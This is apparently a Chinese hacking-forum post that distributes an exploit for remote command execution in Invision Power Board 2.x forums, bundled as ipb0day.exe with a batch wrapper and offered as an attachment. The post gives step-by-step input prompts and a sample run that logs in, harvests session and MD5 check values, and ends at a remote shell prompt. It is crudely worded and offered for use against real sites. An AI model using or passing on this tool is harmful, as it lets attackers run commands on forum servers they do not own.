这个exploit是在0x557.cn irc room superhei 那里得知的 thx
exp的核心是ipb0day.exe 这个fuckipb.bat 只是batShell
运行情况
输入网站地址 例如 http://www.ph4nt0m.org/ipbbbs/ 你就输入 www.ph4nt0m.org
输入网站地址:bbs.null.com
输入论坛目录 例如 http://www.ph4nt0m.org/ipbbbs/ 你就输入 ipbbbs
如果网站直接访问就是论坛 例如 http://www.ph4nt0m.org/ 那你就直接按回车即可
输入论坛目录:
输入注册用户 例如 Prison,break,Tbag 注:尽量用英文
输入注册用户:Tbag
输入用户密码 例如 fuckthegod,12345678,iamagay
输入用户密码:iamagay
输入论坛序列号(Topics) 例如 9,12,24 必须是注册用户可以发贴的论坛
输入论坛序号:5
输入论坛版本 0 对应 2.0.* ; 1 对应 2.1.* 注:你只可以输入0 或者 1
输入论坛版本:1
等待是一辈子的事情................
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LC_ALL = (unset),
LANG = (unset)
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Invision Power Board 2.* commands execution exploit by RST/GHC
(c)oded by 1dt.w0lf r57ipbce.pl and exe build by allyesno
I ren the name r57ipbce.pl 2 ipb0day,allyesno said
Welcome to visit my site http://blog.donews.com/allyesno/
I get the exp form 0x557 irc room via PST superhei
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] 网址或IP : bbs.null.com
[~] 论坛目录 : //
[~] 登录用户 : Tbag
[~] 用户密码 : iamagay
[~] 论坛版本 : 1 - IPB 2.1.*
[~] 正在登录 ... [ 射了 ]
[+] SID: fn39rhdfhs93rr8gh8rgh4geffer3
[~] Try get md5_check ... [ 射了 ]
[+] MD5_CHECK : 39hf8ehfishisf8wkurh38ry8sefh
[~] Create new message ... [ 射了 ]
[~] Search message ... [ 射了 ]
[+] SEARCHID: sdh28egh8sdas8dga7wrg7sfgs
执行linux/win命令或者输入exit退出 # ls
附件: fuckipb.rar [需 0 社区元下载]
该文件已经被下载 9 次.